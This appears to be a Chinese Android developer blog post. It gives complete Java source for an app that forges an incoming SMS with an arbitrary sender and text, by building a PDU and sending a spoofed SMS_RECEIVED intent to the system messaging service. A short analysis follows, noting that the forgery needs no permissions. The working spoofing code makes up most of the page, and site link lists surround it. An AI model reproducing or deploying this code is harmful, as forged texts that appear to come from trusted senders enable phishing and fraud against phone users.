代码实现 
package com.smstrick;import java.io.ByteArrayOutputStream;import java.io.IOException;import java.lang.reflect.Method;import java.util.Calendar;import java.util.GregorianCalendar;import android.app.Activity;import android.content.Context;import android.content.Intent;import android.os.Bundle;import android.telephony.PhoneNumberUtils;import android.util.Log;import android.view.View;import android.view.View.OnClickListener;import android.widget.EditText;public class SMSTrickActivity extends Activity implements OnClickListener{    /** Called when the activity is first created. */    @Override    public void onCreate(Bundle savedInstanceState) {        super.onCreate(savedInstanceState);        setContentView(R.layout.main);        View continue_button = this.findViewById(R.id.button1);        continue_button.setOnClickListener((OnClickListener) this);    }    public void onClick(View v) {    EditText eNum;    EditText eMsg;    String sNum;    String sMsg;        eNum   = (EditText)findViewById(R.id.editText1);    eMsg   = (EditText)findViewById(R.id.editText2);        sNum = eNum.getText().toString();    sMsg = eMsg.getText().toString();            //sNum cannot be blank    if(sNum.equals("")) sNum = "123456";        createFakeSms(this.getApplicationContext(),sNum,sMsg);        }        private static void createFakeSms(Context context, String sender, String body) {    //Source: http://stackoverflow.com/a/12338541    //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app        byte[] pdu = null;        byte[] scBytes = PhoneNumberUtils                .networkPortionToCalledPartyBCD("0000000000");        byte[] senderBytes = PhoneNumberUtils                .networkPortionToCalledPartyBCD(sender);        int lsmcs = scBytes.length;        byte[] dateBytes = new byte[7];        Calendar calendar = new GregorianCalendar();        dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));        dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));        dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));        dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));        dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));        dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));        dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar                .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));        try {        Log.d("ice", "test one");            ByteArrayOutputStream bo = new ByteArrayOutputStream();            bo.write(lsmcs);            bo.write(scBytes);            bo.write(0x04);            bo.write((byte) sender.length());            bo.write(senderBytes);            bo.write(0x00);            bo.write(0x00); // encoding: 0 for default 7bit            bo.write(dateBytes);            try {                            String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";                Class cReflectedNFCExtras = Class.forName(sReflectedClassName);                Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(                        "stringToGsm7BitPacked", new Class[] { String.class });                stringToGsm7BitPacked.setAccessible(true);                byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,                        body);                bo.write(bodybytes);            } catch (Exception e) {            e.printStackTrace();            }            pdu = bo.toByteArray();        } catch (IOException e) {        e.printStackTrace();        }        Intent intent = new Intent();        intent.setClassName("com.android.mms",                "com.android.mms.transaction.SmsReceiverService");        intent.setAction("android.provider.Telephony.SMS_RECEIVED");        intent.putExtra("pdus", new Object[] { pdu });        //intent.putExtra("format", "3gpp");        context.startService(intent);    }    private static byte reverseByte(byte b) {        return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);    }}

实质分析 核心在于自定义了系统的 
        Intent intent = new Intent();        intent.setClassName("com.android.mms",                "com.android.mms.transaction.SmsReceiverService");        intent.setAction("android.provider.Telephony.SMS_RECEIVED");        intent.putExtra("pdus", new Object[] { pdu });        //intent.putExtra("format", "3gpp");        context.startService(intent);

收到短信的intent,从而伪造了短信,而且不需要任何的权限。

更多相关文章

  1. android短信监听
  2. Android如何实现获取短信验证码的功能
  3. Android 之 拦截手机短信并自动转发
  4. android关闭或开启移动网络数据(关闭后,设备不可以上网,但可以打电
  5. android短信服务
  6. Android第二个功能:短信发送
  7. Android调用系统短信发送界面并预设接收号码、短信内容
  8. android打电话发短信
  9. [APP] Android 开发笔记 006-使用短信验证SDK进行短信验证

随机推荐

  1. Android控件之EditText(输入文本框控件)
  2. Android ListView 解决滑动变黑
  3. Android 图书总汇
  4. Android API中文文档EditText
  5. Android开发经验小知识点
  6. android component包含的内容
  7. Android API中文文档ImageView
  8. android:maxLines与android:ellipsize冲
  9. EditText inputType
  10. Android中MaterialDesign使用 (四)Coordi